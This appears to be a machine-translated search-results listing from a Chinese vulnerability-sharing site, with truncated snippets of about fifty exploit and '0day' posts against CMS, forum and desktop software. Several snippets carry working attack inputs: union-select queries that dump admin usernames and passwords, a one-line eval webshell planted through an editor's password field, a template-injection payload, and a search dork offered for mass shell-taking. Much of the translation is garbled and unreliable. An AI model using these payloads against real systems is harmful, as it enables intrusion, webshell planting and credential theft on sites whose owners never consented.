7620 matches found
dir cms width byte injection vulnerability-vulnerability warning-the black bar safety net
Description: Black-box testing unintentionally turned up a wide-byte injection problem in dircms. Although this class of issue was popular for a period of time, people now seem not too concerned about it. Testing found two places with the problem: 1. http://demo. dircms...
BMForum Myna 6.0 SQL injection vulnerability-vulnerability warning-the black bar safety net
BMForum is a new PHP forum program based on the MySQL database, used in personal and business settings. BMForum Myna 6.0 has SQL injection vulnerabilities that could lead to sensitive information disclosure. +info: BMForum Myna 6.0 SQL Injection Vulnerability Author: Stephan Sattler Software...
esp cms injection 0day-vulnerability warning-the black bar safety net
In urldecode the role of the non-filtered result in injection form interface/search.php ---- intaglist ---- $tagkey( Urldecdoe after processing directly into SQL statement, the injection formedcode omitted Test: http://localhost/espcms/index.php?ac=search&at=taglist&tagkey=dd%2 5 2 7,%2527dd%2 5 ...
EggAvatar for vBulletin 3.8.x SQL injection vulnerability-vulnerability warning-the black bar safety net
vBulletin is a well-known commercial forum application. The EggAvatar plug-in for vBulletin 3.8.x has SQL injection vulnerabilities that could lead to sensitive information disclosure. +info: EggAvatar for vBulletin 3.8.x SQL Injection Vulnerability +poc: #!/usr/bin/env perl ...
5UCMS <= v1.2.2024 background missing validation and SQL injection-vulnerability warning-the black bar safety net
Brief description: The admin (background) file performs no verification, and its filtering is not strict, which leads to SQL injection. Detailed description: File location admin/ajax.asp. Line 24: Case "modeext" .. Line 26: ecid=Replace(Request("cid"),"'","") Line 27: cid=Replace(Request("id"),"'","") .. .. 31 The...
iwebshop0. 7. 7 injection 0day-vulnerability warning-the black bar safety net
Use method: 1, the first casual look at a product,and then access the 2, the use of cookies by the browser, you will find inside will be more similar to"iwebhisgoods2 2this number is your access to the product id=1 2 8 2 2 8 2 7 6 2"Project 3, the first in the"2 2"rear add a single quotes, so tha...
PHPWind v7. 5 / v8. 0 vulnerability EXP-vulnerability warning-the black bar safety net
PHPWind v7. 5 / v8. 0 vulnerability EXP theme keywords: phpwind7. 5 Affected version: PHPWind v7. 5 / v8. 0 Command :php pking.php user passhttp://www. xxxx. com/ pking.php: Copy the contents to the clipboard the program code ? php echo" Info: Poc for Phpwind remote command execution Test:...
PhpSou search engine v1.0 backdoor 0day-vulnerability warning-the black bar safety net
I saw someone on the forum analyzing the PhpSou search engine, so I downloaded it to take a look; you don't know until you look. Backdoor code exists at the bottom of include\global.func.php. Pictures provided as proof! I don't know whether the system's programmer left it...evil. Official website http://www. phpsou. c...
SiteServer CMS system 0day-vulnerability warning-the black bar safety net
Detail: with the previous move is easy as registered member you can use xx. asp style registration. While we upload the attachments images also are in accordance with our member name to store. Then the tragedy of 0day is produced. The use of an IIS parsing properties! Use way: The first to enter...
A lot of Taobao guest program upload vulnerability and fix-vulnerability warning-the black bar safety net
| Official website: Vulnerabilityof the page: admin\uploadpic.php Transfer door: PS:copy pictures horse directly xxx.php upload capture address! Fix: uploadvulnerabilityto fix please see this site related articles ---...
Gmail Xss vulnerability can cause the user to be hijacking-vulnerability warning-the black bar safety net
Brief description: Google recently quietly fixed a serious XSS problem in Gmail that could lead to hijacking of user accounts. Detailed description: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="zh-Hans"> <head> <script...
DedeCms v5.6 embedded malicious code execution vulnerability and fix-vulnerability warning-the black bar safety net
Published: 2011-03-02 Affected version: DedeCms v5.6 Vulnerability description: When uploading software, the local address is not effectively validated, so it can be maliciously used (reference: toby57). Test method: Registered members, upload software: the local address filled in...
iPhone / iPod touch TIOD v1.3.3 directory traversal vulnerability-vulnerability warning-the black bar safety net
TIOD is remote directory browsing software for the iPhone / iPod touch. TIOD v1.3 has a directory traversal vulnerability that could lead to sensitive information disclosure. +info: Exploit Title: TIOD v1.3.3 for iPhone / iPod touch, Directory Traversal Date: 03/03/2011 Author: R3d@l3rt,...
ewebeditor 2.8 commercial version of the backend plug in a word and fix-vulnerability warning-the black bar safety net
Affected version:2.8 Business Edition Attack use:login background, click on Change Password---new password set to 1":eval request"a"’ Set after the success, the access to asp/config. asp file, the word Trojan is written to this file inside the In this paper, ewebeditor commercial version...
boblog after the injection of COOKIE spoofing vulnerability-vulnerability warning-the black bar safety net
Published author: the mind Affected versions: boblog latest Official website: http://www.bo-blog.com// Vulnerability type: COOKIE spoofing Vulnerability description: Code index. php code if $go @list$job, $itemid=@explode'', basename$go; Originally injected into the statement for the index. php?...
Shuo Mei web site management system SomiCMS Enterprise Edition v3. 1 0day-vulnerability warning-the black bar safety net
Author: IDEA4 Bulk to take the shell,the keyword your looking for you can! The use method is as follows Copy the code about. php? aid=-1 union select 1,concatusername,0x20,password,3,4,5,6,7 from somiuser limit 0,1/...
FeiXun enterprise website management system v2011 upload vulnerabilities pass to kill 0day-vulnerability warning-the black bar safety net
Affected version: v2011 Official website: http://www.webhtm.cn PRODUCT DESCRIPTION: Suitable Agent building a Business Site of the enterprise source code, The aspect of the practical! Program description: 1. Features: simplified and Traditional Chinese switch, the product display system, news...
phpcms 2008 sp4 path disclosure and arbitrary file deletion vulnerabilities and fixes-vulnerability warning-the black bar safety net
phpcms 2008 sp4 path disclosure and arbitrary file deletion vulnerability and fix. Affected versions: phpcms 2008 sp4 Official address: www.phpcms.cn Vulnerability type: path disclosure and arbitrary file deletion Vulnerability description: a certain page lacks fault-tolerant handling...
Alcassoft's SOPHIA CMS SQL injection vulnerability-vulnerability warning-the black bar safety net
Alcassoft's SOPHIA is an international, powerful content management system. The dsppage.cfm file in Alcassoft's SOPHIA has SQL injection vulnerabilities that could lead to sensitive information disclosure. Title : Alcassoft's SOPHIA CMS is Vulnerable to SQL Injection Found by: p0pc0rn 24/02/2011 We...
dedecms latest vulnerability-vulnerability warning-the black bar safety net
Say the following using the method: registered members, upload software: the local address is filled into a/dede:linkdede:toby57 name="'=0;phpinfo;//"x/dede:toby57, published after the review or modification can be performed. Generated by parsing the file content is as follows: ! After the succes...
ASP may appear in an included vulnerability(Server. execute)-vulnerability warning-the black bar safety net
Author: bin. <% Server.Execute(Request("file")) %> Unlike include, it can include files dynamically, and ASP code inside the included file is executed; it has been seen in use in foreign source code. include.asp?file=./1.txt 1.txt <%response.write(now())%>...
boblog arbitrary variable overwrite vulnerability analysis-vulnerability warning-the black bar safety net
by Ryatpuretot mail: puretot at gmail dot com team: http://www.80vul.com Discovered: 2008-10-02 Publication date: 2011-02-27 Affected versions: 2.1.0, 2.1.1 Status: patched. Vulnerability code is as follows: // go.php $qurl=$_SERVER["REQUEST_URI"]; @list($relativePath,...
RW-Download 4.0.6 sql injection vulnerability and fix-vulnerability warning-the black bar safety net
RW-Download is an upload and download system that supports templates and multiple languages. index.php in RW-Download 4.0.6 has SQL injection vulnerabilities that could lead to sensitive information disclosure. +info: //Title ||= RW-Download v4.0.6 = index.php SQL Injection...
Alcassoft's SOPHIA CMS SQL injection vulnerability and fix-vulnerability warning-the black bar safety net
Alcassoft's SOPHIA is an international, powerful content management system. The dsppage.cfm file in Alcassoft's SOPHIA has SQL injection vulnerabilities that could lead to sensitive information disclosure. +info: Title : Alcassoft's SOPHIA CMS is Vulnerable to SQL Injection Found by: p0pc0rn...
K6dvd music network 0day(anti-injection embarrassing)-vulnerability warning-the black bar safety net
Long time no see code to post before, I believe there should be a lot of seniors already know this BUG!! Ps:although I haven't found, perhaps is too long not concerned about the network! Oh K6dvd television system is the domestic good music leave management system! Today fish called me this week...
Discuz X Series Xss vulnerability small collection-vulnerability warning-the black bar safety net
/ Title: Discuz X Series XSS vulnerability small collection Author: sogili@0xsec From: 0xsec.org Website: 0xsec.org & sogili.com / A small collection of XSS vulnerabilities in the Discuz X series. Relates to Discuz x1.0 & x1.5. Plus one QQ bookmark XSS. sogili whine when you Tinker...
Use the IIS semicolon parsing upload vulnerability analysis-vulnerability warning-the black bar safety net
First look at the following very common file upload extension filter code: fileExt=lcase(ofile.FileExt) arrUpFileType=split(UpFileType,"|") for i=0 to ubound(arrUpFileType) if fileEXT=trim(arrUpFileType(i)) then EnableUpload=true exit for end if next if fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" o...
iPhone PDF Reader Pro 2.3 directory traversal vulnerability-vulnerability warning-the black bar safety net
iPhone PDF Reader Pro 2.3 is PDF reading software for the iPhone. iPhone PDF Reader Pro 2.3 has a directory traversal vulnerability which can lead to sensitive information disclosure. +info: Software : iPhone PDF Reader Pro 2.3 Type of vulnerability : Directory Traversal Tested On :...
Razer official site mysql injection vulnerability and fix-vulnerability warning-the black bar safety net
Brief description: Insufficient filtering of the SQL query leads to a typical blind injection, through which database information can be obtained. Detailed description: the aid parameter is injectable; nothing more to explain. Vulnerability proof: this page returns normally; this page returns an exception...
DISCUZX1. 5 local file inclusion vulnerability-vulnerability warning-the black bar safety net
DISCUZX1. 5 local file inclusion, of course, is conditional, is to use a file as a cache. configglobal.php $config'cache''type' = 'file'; function cachedata$cachenames ...... $isfilecache = getglobal'config/cache/type' == 'file'; ...... if$isfilecache $lostcaches = array; foreach$cachenames as...
Discuz entertainment Hall plug-in V1. 0 injection vulnerability and fix-vulnerability warning-the black bar safety net
| Author:0x0F From:0xsec.org Vulnerability Details: sid variable without filtration generated SQL injection. Exploits:http://site/plugin. php? id=huxhall:huxhall&sid=1 You know. KeyWords:inurl:huxhall:huxhall Related companies:Le tour network HappyYux.com Repair Methods:filtration Has a patch:No...
Galilery 1.0 local file inclusion vulnerability-vulnerability warning-the black bar safety net
Galilery is an open source photo album system written in PHP. Galilery 1.0 has a local file inclusion vulnerability that may lead to sensitive information disclosure. +info: Galilery 1.0 Local File Inclusion Vulnerability $ cat 15lfigalilery.1.0.txt exploit title: local file include...
Woltlab Burning Board 2.3.6 addon SQL injection vulnerability-vulnerability warning-the black bar safety net
Woltlab Burning Board is a web forum program written in PHP with a MySQL backend. The hilfsmittel.php plug-in for Woltlab Burning Board 2.3.6 has SQL injection vulnerabilities that could lead to sensitive information disclosure. +info: Woltlab Burning Board 2.3.6 Addon hilfsmittel.php SQL Injectio...
DIY Web CMS multiple security vulnerabilities-vulnerability warning-the black bar safety net
DIY Web is a simple content management system developed in ASP. DIY Web has multiple security vulnerabilities that could lead to sensitive information disclosure. +info: DIY Web CMS Multiple Vulnerabilities SQL and XSS in DIY Web CMS found by : p0pc0rn 22/2/2011 web :...
Eventum Issue Tracking System 2.3.1 stored cross site scripting vulnerability-vulnerability warning-the black bar safety net
Eventum Issue Tracking System is a flexible bug tracking system with a user-friendly interface that helps development teams quickly organize tasks and bugs. Eventum Issue Tracking System 2.3.1 has a stored cross-site scripting vulnerability that could cause users to...
Escort Directory CMS SQL injection vulnerability-vulnerability warning-the black bar safety net
Escort Directory CMS is a dedicated to the a+site-built CMS, Escort Directory CMS existsql injectionvulnerabilities that could lead to sensitive information disclosure. +info: Exploit Title: Escort Directory CMS SQL Injection Vunerability Google Dork: "Powered By Escort Web design" Platform: php...
Chi Sepang international series system to kill exploit 0day and fix-vulnerability warning-the black bar safety net
Chi Sepang international series system to kill exploit 0day and fix Brief description: this vulnerability should be a series system to kill, in the background Annex to the upload not the file format limit, can lead to upload any type of file. Use method: can be utilized where there are two, one i...
Days buy the background Getshell security-vulnerability warning-the black bar safety net
by k4shifzw. s. t bbs.wolvez.org The last said to-day buy back get the shell. Background injection to the database to insert the code. exp need to fill out the four parameters $host,$path,$formhash, a$cookie. After the submission, the front Desk login code execution. ? php / TianTian Tuangou...
XYCMS law firm built Station system V1. 0 multi-flaw-vulnerability warning-the black bar safety net
XYCMS law firm built Station system V1. 0 http://down.admin5.com/asp/71909.html B0mbErM@n ; 2011-2-18 eWebEditor http://127.0.0.1:99/system/xyeWebEditor/admin/login.asp User=XY2010 Pass=XY2010 XSS http://127.0.0.1:99/online.asp Qq:XSS Mail:XSS Photo:XSS Contents:XSS Eval...
plesk virtual host Management Platform 0day-vulnerability warning-the black bar safety net
1,inhttp://xxxxxx.com:8880here, the default administrator account password is the admin Password stepu 2, in thehttps://xxxxx.com:8443 mssql version Account ' union select top 1 login+char1 2 4+passwd from adminaliases-- Error,broken account password After landing server - remote desktop account...
Chi Sepang international series system to kill the vulnerability 0day-vulnerability warning-the black bar safety net
| This vulnerability should be a series system to kill, in the background Annex to the upload not the file format limit, can lead to upload any type of file. Use method: can be utilized where there are two, one is the background upload attachments. Another is to directly access the http://domain...
Multi Agent System city. asp SQL injection vulnerability and fix-vulnerability warning-the black bar safety net
Author: R4dc0re Information Description: SQL injection may be possible in city.asp of Multi-Agent System because this file insufficiently filters user request queries. The use of this vulnerability may allow an attacker to use to the server application...
DYHB-blog V1. 4 Write the horse vulnerability-vulnerability warning-the black bar safety net
Just download come start to see it. Luck really good。。。。 public.php file visitors to publish the article..... Classic white look at the code | | if$view=="save" ---|--- | //Post form data ---|--- | $title= getargpost 'title' ; ---|--- getargpost is to get the POST Without any filtering And then...
Panda local to mention the right vulnerability-vulnerability warning-the black bar safety net
This article will bring to you is a Panda local to mention the right vulnerability. I think this vulnerability might be for we provide the right help, it'll tell you in detail about, after all, the more an idea is not anything bad. Compile EXP First, look on the vulnerability description. Panda t...
Simple-Log 1.2 delay injection vulnerability-vulnerability warning-the black bar safety net
Vulnerability file: /user.php ! Continue to follow issetmember a function of usage. The interception of the part of the code. /includes/base.function.php ! Not a deeper layer of the call, lest everyone see the mess. As long as the POST submitted in the admin +injected into the statement to make i...
bo-blog upload vulnerability-vulnerability warning-the black bar safety net
| Attention to the following recent of several large cattle site was hacked the message, The know with bo-blog, just under the sleeve 2. 1. 1 See, found a point problem. This program and F2blog the presence of the same upload bug, just use the hard point, to a certain permissions. But the...
Red button DVD software Toolkit DLL hijacking-vulnerability warning-the black bar safety net
/ Red button DVD Software Toolkit DLL Hijacking Exploit iacenc.dll Author : anT!- Tr0J4n Inj3ct0r Site: http://77.120.101.55 Email : D3v-PoinTathotmaild0tcom & C1EHatHotmaild0tcom Greetz : Dev-PoinT.com inj3ct0r.com thanks : r0073r ; Sid3^effects ; L0rd CrusAd3r ; all Inj3ct0r 3 1 3 3 7 Member Ho...
Rising online virus scanner Active - X denial of service-vulnerability warning-the black bar safety net
ProgID: RavOLCtlLib.RavOnline ClassID: 9FAFB576-6933-4CCC-AB3D-B988EC43D04E Member: Scan File: C:\Programme\Rising\RavOL\RavOLCtl.dll script safe: true init the safe: true Because Bullshit like this is unsaleable and i don't want to waste time coordinating patches with this vendor this is a...
Windows Vista / 7 lpksetup.exe DLL hijacking-vulnerability warning-the black bar safety net
/ Exploit: Windows Vista/7 lpksetup.exe oci.dll DLL Hijacking Vulnerability Extension: .mlc Author: Tyler Borland [email protected] Date: 10/20/2010 Tested on: Windows 7 Ultimate Windows Vista Ultimate/Enterprise and Windows 7 Enterprise should be vulnerable as well Effect: Remote Code...